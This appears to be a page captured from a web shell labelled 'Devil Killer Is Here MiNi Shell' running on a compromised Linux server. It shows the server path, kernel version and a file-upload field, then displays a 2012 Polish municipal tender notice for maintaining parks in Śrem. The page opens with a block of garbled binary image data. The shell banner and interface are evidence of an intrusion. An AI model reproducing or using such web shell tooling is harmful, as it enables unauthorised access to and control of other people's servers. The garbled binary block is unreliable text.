JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/80291-N-2012.html

<p class="kh_header"><b>Śrem: Pielęgnacja, konserwacja i bieżące utrzymanie zieleni w Parku Śremskich Odlewników i Parku Powstańców Wlkp.</b><br>
<b>Numer ogłoszenia: 80291 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w  Śremie , pl. 20 Października 1, 63-100 Śrem, woj. wielkopolskie, tel. (061) 2835225 w. 104, faks 061 2835337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srem.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja, konserwacja i bieżące utrzymanie zieleni w Parku Śremskich Odlewników i Parku Powstańców Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> jak w opisie przedmiotu zamówienia;
jak w opisie przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>jak dla zamówienia podstawowego;
jak dla zamówienia podstawowego;</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.10.00-3, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 1 500.00 zł (słownie: jeden tysiąc pięćset  00/100)
Zadanie nr 2 - 1 500.00 zł (słownie: jeden tysiąc pięćset  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj posiadają decyzję na transport odpadów. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia, tj. wykażą iż wykonali należycie co najmniej 2 usługi podobne do przedmiotu zamówienia za kwotę co najmniej 50 tys. zł każda, oraz posiadają zaświadczenie o ukończeniu szkolenia w zakresie stosowania środków ochrony roślin. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym tj. dysponują co najmniej:
kosiarki spalinowe - min. 2 szt., 
kosy spalinowe - min. 3 szt., 
piły spalinowe - min. 2 szt., 
samochód dostawczo-transportowy - 2 szt., 
samobieżną kosiarkę - 1 szt., 
frezarkę do pni - 1 szt., 
rębak do gałęzi - 1 szt. 
krawędziarkę (wycinarkę krawędzi) obrzeży trawników z funkcją umożliwiającą usunięcie przerostów korzenno - glebowych przy krawężnikach drogowych i chodnikowych - 1 szt. 

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia tj. zatrudniają na stałe min. 10 osób, w tym przynajmniej 1 osobę o wykształceniu min. średnie ogrodnicze lub leśne, bądź wyższe kierunkowe i przynajmniej 1 osobę z uprawnieniami pilarza drzew ozdobnych. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej tzn. że posiadają na koncie kwotę nie mniejszą niż 50.000,00 zł (może być wyciąg bankowy) lub posiadają zdolność kredytową w takiej wysokości; oraz posiadają polisę ubezpieczeniową lub inny dokument potwierdzający, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 50.000,00 zł.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srem.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Śremie PL. 20 Października 1, 63-100 Śrem.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 09:00, miejsce: Urząd Miejski w Śremie PL. 20 Października 1, 63-100 Śrem.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pielęgnacja, konserwacja i bieżące utrzymanie zieleni w Parku Miejskim im. Powstańców Wielkopolskich w Śremie - 46 ha..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót:
1)	bieżące całoroczne utrzymanie czystości i porządku w ciągach alejek parkowych poprzez odchwaszczanie na całej powierzchni, zamiatanie, usuwanie zanieczyszczeń i przycinanie brzegów alejek:
	ścieżki asfaltowe - 4 694 m2,
	ścieżki żużlowe - 11 020 m2,
	ścieżki ziemne - 25 222 m2; 
2)	okopywanie trawników przy obrzeżach betonowych - prace należy wykonać w terminie do 5 czerwca 2012 r., a następnie utrzymywanie ich we właściwym stanie;
3)	uzupełnienie brakujących obrzeży betonowych w alejkach żużlowych;
4)	rozgrabianie kretowisk; 
5)	całoroczne utrzymanie czystości i porządku na terenach zielonych (365 343 m2) tj. codzienne usuwanie śmieci;
6)	całoroczna pielęgnacja trawników (75 015 m2) poprzez: 
a.	koszenie - w okresie wegetacyjnym wraz z wywiezieniem pokosu każdorazowo po wykonaniu przycięcia trawy (utrzymanie wysokości trawy w granicach do 8 cm);
b.	nawożenie raz w roku - usługa wraz z kosztem zakupu nawozu, zasilanie wszystkich upraw nawozami mineralnymi wieloskładnikowymi NPK, 2,5 kg nawozu na 100 m2 (zakupiony nawóz należy okazać Zamawiającemu). Termin wykonania do 30 kwietnia każdego roku w okresie trwania umowy (należy powiadomić Zamawiającego pisemnie z co najmniej 3 dniowym wyprzedzeniem o terminie wykonywania prac, celem ich kontroli. Prace należy wykonywać w godzinach pracy Urzędu; 
c.	nawadnianie w okresie suszy - w okresie od maja do września, wodę zapewnia Wykonawca;
d.	dosiewanie traw - usługa wraz z kosztem zakupu siewu trawy 
w okresie od połowy kwietnia do końca sierpnia. Bezpośrednio przed wykonaniem usługi Zamawiający wskaże miejsce;
e.	przygotowywanie terenu pod sadzenia i siew;
f.	całoroczne wygrabianie liści - wywiezienie liści każdorazowo po wykonaniu wygrabienia (nie dopuszcza się zalegania pryzm liści przez okres dłuższy niż 1 dzień); 
7)	całoroczna pielęgnacja kwietników sezonowych: odchwaszczanie, nawożenie, usuwanie przekwitłych kwiatostanów i podlewanie 
w zależności od potrzeb, wykonywanie nowych nasadzeń (184 m2); 
8)	oczyszczanie gazonów oraz obsadzanie ich roślinnością;
9)	całoroczna pielęgnacja kwietników z róż i bylin: odchwaszczanie, nawożenie, usuwanie przekwitłych kwiatostanów, podlewanie 
w zależności od potrzeb, przygotowanie do okresu zimy (800 szt. róż, byliny na obszarze ok. 50 m2, skalniaki - 350 m2);
10)	całoroczna pielęgnacja żywopłotów tj. przycinanie, oczyszczanie ze   	śmieci, podlewanie i uzupełnianie (ok. 560 m2);
11)	bieżące i całoroczne wykonywanie zabiegów pielęgnacyjnych na 	drzewach i krzewach, w szczególności wykonywanie cięć sanitarnych, 	korekcyjnych, prześwietlanie koron drzew, usuwanie połamanych oraz 	suchych drzew i gałęzi, usuwanie odrostów korzeniowych i pniowych, 	mechaniczne wzmacnianie drzew-zakładanie wiązań elastycznych 
	w koronach drzew, zdejmowanie zawieszonych gałęzi i konarów 
	w koronach drzew; 
12)	przeprowadzanie wycinki drzew i krzewów w parku (w ilości do 30 drzew) - usuwanie drzew z frezowaniem pniaków 	(frezowanie niezwłocznie po wycince), frezowanie pniaków 
	z wcześniejszych wycinek, usuwanie samosiewów, pocięcie drzew 	na 	klocki i wywóz pociętych na klocki drzew każdorazowo do Ośrodka 	Pomocy 	Społecznej w Śremie przy ul. Mickiewicza 40 	(Wykonawca zobowiązany jest uzyskać potwierdzenie OPS 	zestawienia ilości 	przekazanego drewna z obmiarem Zamawiającego). 	Koszty ewentualnej wycinki drzew i krzewów w parku ponosić 	będzie Wykonawca. Wykonawca zobowiązany jest powiadomić 	każdorazowo Zamawiającego o terminie przeprowadzania wycinki;
13)	zrębowanie gałęzi (obsypywanie rabat i gazonów zrębkami);
14)	uzupełnienie drzewostanu - sadzenie drzew, krzewów, pnączy 
	i bylin (materiał zapewni Zamawiający), 
15)	usuwanie jemioły  z drzew;
16)	palikowanie drzew nowo posadzonych (trzy paliki stabilizowane 	poprzecznie - paliki zapewni Wykonawca) i zabezpieczanie siatką PCV 	przed zwierzyną;
17)	usuwanie wiatrołomów;
18)	tworzenie niecek na powierzchni gleby wokół nowo posadzonych drzew i krzewów;
19)	pielęgnacja drzew na terenie zalesionym w parku tj. na obszarze 18 ha 	oraz uzupełnianie drzewostanu;
20)	dokonywanie nasadzeń z materiału powierzonego przez 	Zamawiającego;
21)	koszenie trawy wraz z utrzymaniem czystości wzdłuż ulicy 	Piłsudskiego na wysokości parku (pas zieleni od granic parku do 	asfaltu);
22)	wygrabianie i usuwanie liści w okresach wiosennym i jesiennym (dot. 	terenu od strony ul. Franciszkańskiej do Pomnika Żołnierza Polskiego 
	w parku);
23)	w okresie zimowym uprzątanie śniegu i zabezpieczenie przed 	gołoledzią głównej alei asfaltowej (4 694 m2), zimowe utrzymanie 	alejek ziemnych (oczyszczanie alejek nieutwardzonych ze śniegu, lodu, 	błota), śliskość na ciągach pieszych winna być usuwana przede 	wszystkim przy użyciu piasku;
24)	bieżące naprawy i malowanie ławek parkowych oraz koszy na śmieci 	(w terminie do 30 września 2012 r.), 	całoroczne usuwanie śmieci 
	z 	koszy parkowych i psich stacji, mycie 
	i dezynfekcja w zależności od potrzeb (dodatkowo uzupełnianie 	wg 	potrzeb woreczków w psich stacjach - woreczki zapewni 	Zamawiający);
25)	zabezpieczenie i przechowywanie przez okres zimy 
	przenośnych ławek parkowych, prowadzenie na bieżąco rejestru ilości 	ławek i koszy z określeniem ich lokalizacji;
26)	podejmowanie działań w przypadku stwierdzenia aktów wandalizmu 	(tj. ponowne ustawienie przewróconych koszy, pozbieranie 	wysypanych odpadów oraz zgłoszenie tego faktu Zamawiającemu 
	i 	powiadomienie odpowiednich służb - Policji, Straży Miejskiej, 	zgłaszanie Zamawiającemu faktu zaginięcia ławek i koszy lub zmiany 	lokalizacji;
27)	całoroczne utrzymanie Ogrodu Jordanowskiego tj. utrzymanie 	czystości i porządku na terenie placu zabaw - konserwacja urządzeń 	zabawowych, w tym dbałość o estetykę i stan techniczny urządzeń 	(odmalowanie 1 raz w roku na wiosnę urządzeń zabawowych 
	w istniejącej kolorystyce, farbami impregnacyjno-dekoracyjnymi 	przeznaczonymi do użytku zewnętrznego po uprzednim oczyszczeniu 	ich z pozostałości starej farby), wykonywanie bieżących napraw, w tym 	opłotowania z wyłączeniem oświetlenia parkowego, wymiana piasku 
	w piaskownicy dwa razy w roku w miesiącach kwiecień i lipiec, 
	a później uzupełnianie wg potrzeb (piasek płukany frakcji 0,2 mm lub 	żwirek 2 - 8 mm); 
28)	oczyszczanie fosy przy mostku;
29)	umocnienie i pielęgnacja skarp kamiennych oraz drugiego patio - 	skalniak na terenie Ogródka Jordanowskiego;
30)	całoroczne prowadzenie zwierzyńca parkowego w tym utrzymywanie 	czystości i porządku, opieka nad przebywającymi tam zwierzętami tj.: 	koza - 3 szt., baran - 1szt., kaczki - 18 szt., kury - 8 szt., gęsi - 2 szt., 	(karmienie, pojenie, zapewnienie schronienia w okresie zimy, 	zapewnienie opieki weterynaryjnej);
31) wymiana siatki ogrodzeniowej wokół zwierzyńca - 195 mb (siatka 	ogrodzeniowa powlekana PCV, wysokość siatki 150cm, oczko 50mm, 	grubość drutu 2,5mm), remont bramy (osadzenie jej na nowo wraz 	odmalowaniem), odbudowa zniszczonej podmurówki, wymiana  uszkodzonych słupków ogrodzeniowych w ilości nie większej niż 20 szt., remont pozostałych słupków ogrodzeniowych wraz z ich odmalowaniem - prace należy wykonać w terminie do 31 sierpnia 2012 r.;
32)	utrzymywanie zgodnie z przepisami przeciwpożarowymi pasa 	ochronnego zlokalizowanego na przedłużeniu ul. Parkowej do wału 	przy kanale Ulgi; 
